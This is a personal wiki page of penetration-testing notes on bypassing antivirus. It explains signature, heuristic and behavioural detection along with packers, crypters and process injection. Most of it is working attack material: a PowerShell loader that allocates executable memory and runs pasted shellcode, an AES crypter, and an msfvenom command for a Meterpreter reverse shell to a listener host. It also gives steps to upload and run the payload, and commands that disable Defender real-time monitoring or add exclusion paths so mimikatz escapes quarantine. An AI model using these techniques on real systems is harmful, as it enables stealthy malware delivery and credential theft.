Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.6
Creation-Date: 2021-10-19T15:39:38-05:00
====== AV Bypass ======
Created Tuesday 19 October 2021
===== Signature based detection =====
Some AV kits use signature based detection, which tries to match the actual bytes (or a hash) of a known malicious payload, in transit or on the filesystem.
This is a blacklist approach: every known payload gets an entry on the list, so it can never be catch-all.
When trying to get a payload onto a system with AV, it is therefore paramount to identify the vendor and version of the toolkit,
so that a strategy for it can be determined.
===== Heuristic detection =====
An AV toolkit will disassemble a payload and, based on its instructions and structure (suspicious imports, self-modifying code, an odd entry point), decide whether it looks malicious without needing an exact signature.
===== Behavioural analysis =====
An AV toolkit will run the payload in an isolated environment (a sandbox or emulator) and, based on the behaviour of the program, e.g. the API calls it makes, determine whether it is malicious.
====== Evasion ======
There are generally two kinds of evasion:
* On disk
* In memory
===== On disk evasion =====
=== Packers ===
Packers compress the executable and prepend a small decompression stub, so the bytes on disk change while the program stays functionally equivalent; a static signature for the original payload no longer matches.
[[Tools:Linux:upx]] is the classic tool for this, but one cannot rely on it alone to bypass modern anti-virus detection: UPX is well known, AV engines unpack it statically, and the UPX stub itself is a signal.
=== Obfuscators ===
Primarily used by vendors to protect their IP, obfuscators are also used to evade AV detection.
They operate by mangling function names, inserting "dead code", splitting functions, etc. to make detection harder.
This technique is only marginally effective against AV detection.
=== Crypters ===
Simple. The payload is stored encrypted, together with a decryption stub that decrypts it in memory and executes it. Only the stub is visible to a static scan, and re-encrypting with a fresh key yields a different file every time.
This is the modern-day basis of AV evasion. Caveat: the key ships with the stub, so the stub is what ends up signatured, and the decrypted payload is exposed to memory scanning and behavioural analysis the moment it runs.
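As an added example (not code from the original page) of what a crypter does, the PowerShell below has a build side that AES-encrypts a payload with a fresh key and IV and prints the result as PowerShell byte literals in the same shape msfvenom's powershell format uses, and a run side that decrypts the blob back into a byte array ready for a loader. The payload used here is a constructed stand-in (a single RET instruction, 0xC3), not real shellcode; the function and variable names are this example's own.

```powershell
# Added example: minimal AES-CBC crypter for shellcode.
# Build side encrypts and emits literals; run side decrypts in memory.

function Protect-Shellcode {
    param([Parameter(Mandatory)][byte[]]$Plain)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.GenerateKey(); $aes.GenerateIV()   # new key+IV per build: the on-disk blob differs every time
    $enc    = $aes.CreateEncryptor()
    $cipher = $enc.TransformFinalBlock($Plain, 0, $Plain.Length)
    $result = [PSCustomObject]@{ Key = $aes.Key; IV = $aes.IV; Cipher = $cipher }
    $enc.Dispose(); $aes.Dispose()
    return $result
}

function Unprotect-Shellcode {
    param([Parameter(Mandatory)][byte[]]$Cipher,
          [Parameter(Mandatory)][byte[]]$Key,
          [Parameter(Mandatory)][byte[]]$IV)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key; $aes.IV = $IV
    $dec   = $aes.CreateDecryptor()
    $plain = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length)
    $dec.Dispose(); $aes.Dispose()
    return ,$plain   # leading comma stops PowerShell from unrolling the byte[]
}

function ConvertTo-PSByteLiteral {
    # Same "[Byte[]] $name = 0x..,0x.." shape that msfvenom -f powershell -v <name> emits
    param([Parameter(Mandatory)][byte[]]$Bytes, [string]$Name = 'buf')
    $hex = ($Bytes | ForEach-Object { '0x{0:x2}' -f $_ }) -join ','
    return "[Byte[]] `$$Name = $hex"
}

# --- build side (on the attacker box) ---
$Stub = [byte[]](0xC3)                     # constructed stand-in for real shellcode: a single RET
$p = Protect-Shellcode -Plain $Stub
ConvertTo-PSByteLiteral -Bytes $p.Cipher -Name 'enc'   # paste these three lines into the delivered stub
ConvertTo-PSByteLiteral -Bytes $p.Key    -Name 'key'
ConvertTo-PSByteLiteral -Bytes $p.IV     -Name 'iv'

# --- run side (inside the delivered stub, after the literals are in place) ---
$sc = Unprotect-Shellcode -Cipher $p.Cipher -Key $p.Key -IV $p.IV
if (($sc -join ',') -ne ($Stub -join ',')) { throw 'round-trip failed' }
# $sc now holds the original bytes; hand it to a VirtualAlloc/CreateThread loader
```

Two things to keep in mind when using this shape for real: the decryption code is identical from build to build, so that is what gets signatured next, and a high-entropy blob in an otherwise small script is itself a heuristic signal.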
=== Protectors ===
These toolkits protect a binary against analysis, cracking, modification etc. (anti-debugging, code virtualisation, integrity checks). They can also be used to protect your payload.
A current toolkit that provides a reasonable amount of protection is TheEnigmaProtector.
===== In memory evasion =====
These techniques rely on manipulating RAM rather than dropping files, and thus aim to bypass the file scanners that most AV products focus on.
Note that Defender still receives PowerShell script content through AMSI before it runs, and modern EDR products scan memory as well, so "in memory" is not "invisible".
=== Remote Process Memory Injection ===
This technique involves injecting malicious code into a legitimate running program.
Windows APIs are used to open the target (OpenProcess), allocate memory in the remote process' address space (VirtualAllocEx), write the payload into it (WriteProcessMemory) and make the program run it in a separate thread (CreateRemoteThread).
=== Reflective DLL Injection ===
This is similar to DLL injection, where a malicious DLL on disk is loaded into a target using the LoadLibrary API. To keep everything in memory, the DLL instead carries its own loader: an exported function that maps the DLL's sections, applies relocations, resolves imports and calls DllMain, so the DLL never has to exist as a file.
Since Windows does not expose an API to load a DLL from a memory buffer, a developer needs to build this loader himself.
=== Process Hollowing ===
This technique involves starting a legitimate program in a suspended state (CreateProcess with CREATE_SUSPENDED). Then the program's image is unmapped from the process and replaced by the malicious image, and the main thread's entry point is pointed at it.
Then the process is resumed and the malicious code executes under the name and path of the legitimate program.
=== Inline hooking ===
The first instructions of a function in a program are overwritten with a jump to the malicious payload, i.e. control flow is redirected to it; afterwards the overwritten instructions are executed and control is returned to the legitimate function as if nothing happened.
====== Enumeration ======
{{{code: lang="texinfo" linenumbers="False"
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
}}}
* Lists the paths Defender is configured not to scan, i.e. places where a payload can live untouched :)
* Needs an elevated shell on current builds: recent Defender platform updates hide the exclusion lists from non-admin users
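An added example (not code from the original page) that widens the one-liner above into a posture snapshot: it reads all three exclusion lists from Get-MpPreference, cross-checks them against the registry keys where Defender stores them, pulls real-time protection and Tamper Protection state from Get-MpComputerStatus, and lists recent exclusion changes from event 5007 in the Defender operational log, which is the same place a defender would look for this. It assumes an elevated PowerShell on a host running Microsoft Defender; the function name is this example's own.

```powershell
# Added example: Defender posture snapshot (run elevated)
function Get-DefenderPosture {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus

    # Exclusions as the cmdlet reports them
    $exclusions = [ordered]@{
        Paths      = @($pref.ExclusionPath)
        Extensions = @($pref.ExclusionExtension)
        Processes  = @($pref.ExclusionProcess)
    }

    # The same lists straight from the registry, where Defender stores them
    $regRoot = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions'
    $fromRegistry = foreach ($sub in 'Paths', 'Extensions', 'Processes') {
        $item = Get-ItemProperty -Path (Join-Path $regRoot $sub) -ErrorAction SilentlyContinue
        if ($item) {
            $item.PSObject.Properties |
                Where-Object { $_.Name -notlike 'PS*' } |          # drop the provider metadata properties
                ForEach-Object { [PSCustomObject]@{ Kind = $sub; Value = $_.Name } }
        }
    }

    # Every configuration change is logged as event 5007; exclusion edits show up in the message text
    $recentChanges = Get-WinEvent -FilterHashtable @{
            LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007
        } -MaxEvents 200 -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Exclusions' } |
        Select-Object TimeCreated, Message

    [PSCustomObject]@{
        RealTimeProtection = $status.RealTimeProtectionEnabled
        TamperProtected    = $status.IsTamperProtected
        EngineVersion      = $status.AMEngineVersion
        SignatureVersion   = $status.AntivirusSignatureVersion
        Exclusions         = $exclusions
        ExclusionsRegistry = @($fromRegistry)
        ExclusionChanges   = @($recentChanges)
    }
}

$posture = Get-DefenderPosture
$posture | Format-List
$posture.ExclusionChanges | Format-Table -AutoSize -Wrap
```

If TamperProtected comes back True, the Set-MpPreference tricks further down this page will be blocked, so check this first.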
====== Practical exploitation ======
{{{code: lang="powershell" linenumbers="False"
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
# Paste the msfvenom output here; it must match the bitness of the powershell.exe running this script
[Byte[]] $sc = <place your shellcode here>;
# Allocate at least one page; 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
# Copy the shellcode byte by byte; ToInt64 keeps this working in 64-bit powershell, where ToInt32 overflows on high addresses
for ($i=0;$i -le ($sc.Length-1);$i++) {
$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], 1)
};
# Run the buffer on a new thread and keep the process alive so the session survives
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
}}}
This script does the following:
* Imports the functions VirtualAlloc and CreateThread from kernel32.dll, and memset from msvcrt.dll, via Add-Type
* Allocates a readable, writable and executable buffer of at least one page (0x1000 bytes), or the size of the shellcode if larger, within powershell's own process memory
* Loops over the shellcode bytes and writes them into the allocated memory one by one
* Creates a thread with the allocated memory (now holding the shellcode) as its starting point, then sleeps forever so the process, and with it the session, stays alive
===== Shellcode generation =====
The shellcode to be inserted into the <place your shellcode here> section can be generated as follows. It must be a Windows payload matching the bitness of the powershell.exe that will run the script (windows/x64/... for 64-bit powershell, windows/meterpreter/reverse_tcp for 32-bit); Linux shellcode cannot run inside a Windows process:
{{{code: lang="sh" linenumbers="False"
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<host> LPORT=<port> -f powershell -v sc
}}}
* -f powershell -v sc emits a complete [Byte[]] $sc = 0x..,0x.. line, so it replaces the whole $sc line in the script above
* Now save the whole blob as a <file.ps1> file
===== Upload + execute =====
* Upload the whole thing onto your target system.
* Setup a meterpreter listener using msfconsole as described here: [[Tools:Linux:MetaSploit:payloads:meterpreter]]
* Execute as follows:
{{{code: lang="sh" linenumbers="False"
powershell -ExecutionPolicy Bypass .\<filename>
}}}
===== Turn off Defender =====
Sometimes you want to run mimikatz, but Defender quarantines it and you get:
{{{code: lang="texinfo" linenumbers="False"
The system cannot execute the specified program.
}}}
The following turns off real-time monitoring. It needs an elevated shell, and on current Windows 10/11 builds Tamper Protection is on by default and blocks the change; when it does go through, Defender logs event 5001 (real-time protection disabled):
{{{code: lang="texinfo" linenumbers="False"
powershell Set-MpPreference -DisableRealtimeMonitoring $true
}}}
Verify with (True means monitoring is off):
{{{code: lang="texinfo" linenumbers="False"
powershell "(Get-MpPreference).DisableRealtimeMonitoring"
}}}
===== Set exclusion path =====
You can specify an exclusion path where Defender won't look. Note that Set-MpPreference -ExclusionPath replaces the whole exclusion list (which may be noticed); Add-MpPreference -ExclusionPath <path> appends to it instead. Either way the change is logged as event 5007.
{{{code: lang="texinfo" linenumbers="False"
powershell Set-MpPreference -ExclusionPath <path>
}}}
* Now you can put your mimikatz there without it being quarantined
===== SHELLTER =====
Check out [[Tools:Linux:shellter]] for a cool tool to inject payloads into a legitimate .exe file that, when present on the filesystem, won't trip AV detection.
===== MSFVENOM =====
* You can try to embed your payload in a legitimate binary, much like shellter does, using [[Tools:Linux:MetaSploit:msfvenom]] (-x <template.exe> -k). Check the page for an example
* Also, you can try to increase the rounds of the shikata_ga_nai encoder (-e x86/shikata_ga_nai -i <rounds>). It is x86 only and its decoder stub is heavily signatured, so extra rounds alone rarely defeat a modern AV
===== REMARKS =====
* AV has a harder time detecting malicious scripts, so powershell is a good candidate to perform the heavy lifting. Keep in mind that AMSI hands the script content to Defender before it runs, so a well-known script gets caught even when it never touches disk
* Scripts can easily be altered if the AV still detects them (renaming variables, splitting or re-encoding flagged strings) without the need for recompilation
===== SEE =====
https://www.enigmaprotector.com/en/about.html
[[Tools:Linux:shellter]]